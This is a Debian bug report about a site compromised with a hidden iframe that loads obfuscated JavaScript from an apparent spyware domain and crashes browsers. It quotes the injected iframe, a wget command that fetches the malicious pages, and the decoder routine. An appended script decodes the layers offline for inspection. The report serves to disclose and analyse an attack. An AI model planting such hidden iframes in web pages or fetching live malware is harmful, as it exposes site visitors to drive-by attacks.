Package: epiphany
Version: 0.5.1-4
Severity: serious
Tags: security

I'm seeing this bug using epiphany, but also with other related web browsers (firefox/iceweasel), so you'll probably want to pass it up the library chain.

Today something apparently changed on the sfreviews.net site, since when I visited it, epiphany began to use > 400 mb of memory and just sucked down more and more until things got ugly. It had been ok yesterday. I'm ccing its webmaster, since I trust him, and his normally well-behaved and informative site is doing something very wrong and strange.

The strange thing seems to be this, near the end of the sfreviews.net front page:

    <iframe name="3" src="http://andyserver.info/check/version.php?t=179" width=1 height=1 style="display:none"></iframe></body>

I don't know what this is there for, but it yields the file I've named "crashme.html" in the attached tarball. This is where things get dodgy, because andyserver.info appears to be a spyware domain (just google for it). It would be nice if attempted windows trojans didn't accidentally crash our web browsers..

crashme.html contains 9 more iframes named n1404-[1-9].htm. andyserver.info doesn't allow you to wget these unless you fool with the user-agent string and pretend to be a real web browser:

    [EMAIL PROTECTED]:~>wget -U "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.6) Gecko/20070801 (Debian-1.8.1.6-1) Epiphany/2.18" 'http://andyserver.info/check/n1404-8.htm'

Just loading n1404-3.htm causes epiphany to use 229 mb of memory. The others increase the memory usage by different amounts, apparently. When they're all loaded together as is done by the iframe in crashme.html, the result is not pretty.

These files are where things get really strange and ugly, since they consist of a pile of obfuscated javascript. The javascript can be decoded in 2 stages. First, replace the first "document.write" with "alert". This yields an alert box with the second-stage decoder:

    function twxcdimun(rrr){
        var temp="";
        document.write("------------");
        var ccc=0;
        var out="";
        var str=rrr;
        l=str.length;
        while(ccc<=str.length-1){
            while(str.charAt(ccc)!='N')temp=temp+str.charAt(ccc++);
            ccc++;
            out=out+String.fromCharCode(((parseInt(temp,16)-84)));
            temp="";
        }
        document.write(out);
    }

Then just replace the if block you modified before with the above code, and modify the new code s/document.write/alert/ again. This yields a new page with yet more javascript in it. I've not tried to work out what this second layer is supposed to do, although it does contain yet a third layer, encoded just as badly.

Workaround: Disable javascript :-/ or null-route andyserver.info

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.22-1-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages epiphany depends on:
ii  epiphany-data        0.5.1-4    required maps for epiphany game
ii  libc6                2.6.1-2    GNU C Library: Shared libraries
ii  libclan2c2a-sound    0.6.5-1-4  Sound module for ClanLib game SDK
ii  libclanlib2c2a       0.6.5-1-4  ClanLib game SDK core runtime
ii  libgcc1              1:4.2.1-5  GCC support library
ii  libstdc++6           4.2.1-5    The GNU Standard C++ Library v3

epiphany recommends no packages.

-- no debconf information

-- 
see shy jo
evil.tar.gz
Description: Binary data
signature.asc
Description: Digital signature
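The report decodes the second stage by hand, swapping document.write for alert in a browser. As an added example (not part of the bug report or of the quoted script), here is a stand-alone re-implementation of the same decoding rule so the next layer can be recovered offline and inspected as text, never executed. The function names (decodeStage2, encodeStage2, peelLayers), the assumption that each layer is a bare twxcdimun("...") call, and the sample payload are all constructed for this example; only the scheme itself (hex chunks terminated by 'N', minus 84) comes from the quoted decoder.

```javascript
// Added example, not code from the bug report: an offline re-implementation of the
// quoted twxcdimun() decoding rule, plus a loop that peels nested layers.
//
// Scheme recovered from the quoted decoder: the payload is a run of hexadecimal
// chunks, each terminated by the letter 'N'; each chunk yields one character,
// String.fromCharCode(parseInt(chunk, 16) - 84).

const KEY_OFFSET = 84; // constant taken from the quoted decoder (parseInt(temp,16)-84)

// Decode one layer. Unlike the original, a chunk that is not closed by 'N' or is
// not valid hex raises an error instead of spinning forever: the quoted inner loop
// keeps calling str.charAt() past the end (which returns ""), so it never sees 'N'.
function decodeStage2(payload) {
  let out = "";
  let chunk = "";
  for (const ch of payload) {
    if (ch !== "N") {
      chunk += ch;
      continue;
    }
    if (!/^[0-9a-fA-F]+$/.test(chunk)) {
      throw new Error(`malformed chunk "${chunk}" before 'N'`);
    }
    out += String.fromCharCode(parseInt(chunk, 16) - KEY_OFFSET);
    chunk = "";
  }
  if (chunk.length > 0) {
    throw new Error(`trailing chunk "${chunk}" has no terminating 'N'`);
  }
  return out;
}

// Inverse of decodeStage2. Used here only to build a constructed sample payload;
// it is not part of anything quoted in the report.
function encodeStage2(text) {
  return Array.from(text, (ch) =>
    (ch.charCodeAt(0) + KEY_OFFSET).toString(16).toUpperCase() + "N"
  ).join("");
}

// Peel layers while the decoded text is itself another decoder call, stopping at
// the first layer that is plain script. The wrapper shape is an assumption made
// for this example: each layer is exactly twxcdimun("<payload>").
const WRAPPED_CALL = /^twxcdimun\("([0-9A-Fa-fN]*)"\)$/;
function peelLayers(script, maxLayers = 10) {
  const layers = [script];
  let current = script;
  for (let i = 0; i < maxLayers; i++) {
    const m = WRAPPED_CALL.exec(current.trim());
    if (!m) break;
    current = decodeStage2(m[1]);
    layers.push(current);
  }
  return layers;
}

// Constructed sample: a benign inner script wrapped in two encoded layers.
const INNER_TEXT = 'alert("stage three reached")';
const LAYER2 = `twxcdimun("${encodeStage2(INNER_TEXT)}")`;
const LAYER1 = `twxcdimun("${encodeStage2(LAYER2)}")`;

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  for (const [i, layer] of peelLayers(LAYER1).entries()) {
    const shown = layer.length > 60 ? layer.slice(0, 60) + "..." : layer;
    console.log(`layer ${i}: ${shown}`);
  }
}
```

Decoding as text rather than in a browser is what makes the third layer the report mentions safe to look at: peelLayers returns every intermediate layer as a string, and a payload that the original decoder would hang on (no terminating 'N') is rejected with an error.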